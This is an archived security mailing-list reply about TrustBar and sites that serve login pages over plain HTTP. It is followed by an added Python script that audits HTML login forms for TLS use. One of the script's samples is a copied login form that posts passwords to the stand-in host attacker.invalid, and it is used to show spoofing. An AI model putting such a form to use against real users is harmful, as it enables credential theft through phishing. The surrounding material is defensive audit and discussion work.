WebApp Sec mailing list archives

Re: TrustBar and insecure sites of PayPal, MS Passport, Yahoo!, Chase, ...


From: Amir Herzberg <herzbea () cs biu ac il>
Date: Tue, 26 Oct 2004 14:50:48 +0200

Yvan G.J. Boily wrote:

> The point Mr. Wall was trying to make is that using SSL to "protect" a login
> page prior to the actual (HTTP Verb) which submits the credentials to the
> web server does nothing to prevent a user from falling victim to a spoofed
> web page.
That's incorrect. By protecting the login form, we prevent a rogue page which appears as the original, but sends the password to the attacker instead of sending it (securely) to the correct site.

> Your trustbar tool is essentially just another way of putting information in
> front of the users face, however it does nothing that isn't already
> available.
This is mostly correct; TrustBar is a secure user interface mechanism. Our research (and common sense) shows that most users do not validate the URL and the certificate, but do notice our `unprotected page` warning vs. the correct logo of the site.

TrustBar also protects from the more advanced (academic?) spoofing attacks, which present a fake location bar, padlock, etc. But I think that's less important in practice.

> Since the "trustbar" is not part of the default distribution of
> a browser it will not do much to further awareness, or protect a user.  This
> is more so the case because a user who has the understanding to install the
> software will generally not be caught by a phishing scam or fooled by a
> spoofed server.

Well... TrustBar is just a research project; we definitely hope the ideas in it will be adopted in future releases of browsers. Also, I think that in many cases, it could be installed on machines of naive users (e.g. by the employer, organization, ISP, etc.). Finally, I actually believe that even security savvy users will find it much more convenient and secure to use TrustBar (or comparable technology) compared to checking manually whenever they use a sensitive site... I definitely feel much better about doing my e-banking now.
<skip>
> The reason this is important is because you claim the "lock" icon is
> misleading.  I say that the lock icon is more intuitive than a "trust bar"
> or the SSL warnings.  People using e-commerce sites have been indoctrinated
> to "look for the padlock" and "click on it for more information".
That's an interesting possibility... I didn't get this feedback in the surveys we did so far, but I'll try to check specifically for it in the future. BTW, I tried doing it on the Chase site and still didn't find any way to reach a protected login page there... is there?

> It is my opinion that you are likely doing more damage than good by
> spreading fear, uncertainty, and doubt about a widely used, and commonly
> accepted practice to which your proposed solution does essentially nothing
> about.
Sorry, that's not my intention. In all your arguments, I didn't see an answer to my simple question: why don't they protect the login page??? Considering that there is a trivial fix to the problem, and that I've pointed it out to all these sites before informing others, I can't really see where you find me wrong.

> I apologize if this seems unduly harsh, but I think that you may have lost
> sight of the intended audience during your academic pursuits.
No offense taken.

Best, Amir Herzberg
http://AmirHerzberg.com
Associate Professor, Computer science department, Bar Ilan University
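The disagreement above is about two separate properties: whether the credentials are posted over TLS, and whether the page carrying the login form was itself delivered over TLS. The following audit script is an added example for this thread (it is not TrustBar code, and it is not taken from any of the sites named); it parses a page for forms containing a password field and reports which of the two properties hold. The page URLs and HTML snippets are constructed samples, and the hostname attacker.invalid stands in for an arbitrary rogue host.

```python
"""Audit login forms: is the form page itself delivered over TLS, and does
the form submit over TLS?  Added example for the mailing-list thread above;
not TrustBar code and not captured from any real site."""

from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormFinder(HTMLParser):
    """Collects every <form> together with the (type, name) of its inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                ((a.get("type") or "text").lower(), a.get("name") or ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_login_forms(page_url, html):
    """Return one finding per form that contains a password field.

    verdict values:
      "ok"              page and submission are both HTTPS
      "form-in-clear"   submission is HTTPS but the form page arrived over
                        plain HTTP: the page can be replaced in transit or
                        copied, and the user has nothing to verify before
                        typing (the case argued in the thread)
      "submit-in-clear" the credentials themselves are posted over HTTP
    same_host is False when the form posts to a different host than the one
    that served the page, which is what a copied (rogue) page typically does.
    """
    parser = _FormFinder()
    parser.feed(html)
    page = urlsplit(page_url)
    findings = []
    for form in parser.forms:
        if not any(t == "password" for t, _ in form["inputs"]):
            continue
        # An empty or relative action inherits the page's scheme and host.
        action = urljoin(page_url, form["action"])
        act = urlsplit(action)
        if act.scheme != "https":
            verdict = "submit-in-clear"
        elif page.scheme != "https":
            verdict = "form-in-clear"
        else:
            verdict = "ok"
        findings.append({
            "action": action,
            "page_https": page.scheme == "https",
            "action_https": act.scheme == "https",
            "same_host": act.hostname == page.hostname,
            "verdict": verdict,
        })
    return findings


# Constructed samples (hypothetical URLs and markup, not from any real site).
LOGIN_FORM = ('<form action="%s" method="post">'
              '<input name="user"><input type="password" name="pass"></form>')

# The pattern criticised in the thread: HTTP page, HTTPS submission.
CLEAR_PAGE_TLS_POST = ("http://www.example.com/",
                       LOGIN_FORM % "https://login.example.com/auth")
# Form page and submission both over TLS; relative action resolves to HTTPS.
TLS_PAGE_TLS_POST = ("https://www.example.com/login", LOGIN_FORM % "/auth")
# A copied page that looks identical but posts the password elsewhere.
SPOOFED_PAGE = ("http://www.example.com/",
                LOGIN_FORM % "https://attacker.invalid/auth")

if __name__ == "__main__":
    for label, sample in [("clear page, TLS post", CLEAR_PAGE_TLS_POST),
                          ("TLS page, TLS post", TLS_PAGE_TLS_POST),
                          ("spoofed copy", SPOOFED_PAGE)]:
        for f in audit_login_forms(*sample):
            print(f"{label:22s} -> {f['verdict']:16s} "
                  f"action={f['action']} same_host={f['same_host']}")
```

Note that the spoofed copy and the legitimate clear-page site get the same verdict: as far as the browser can tell before the POST, an HTTP login page and a forged HTTP login page are indistinguishable, which is the reason the thread asks for the form page itself to be served over TLS.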

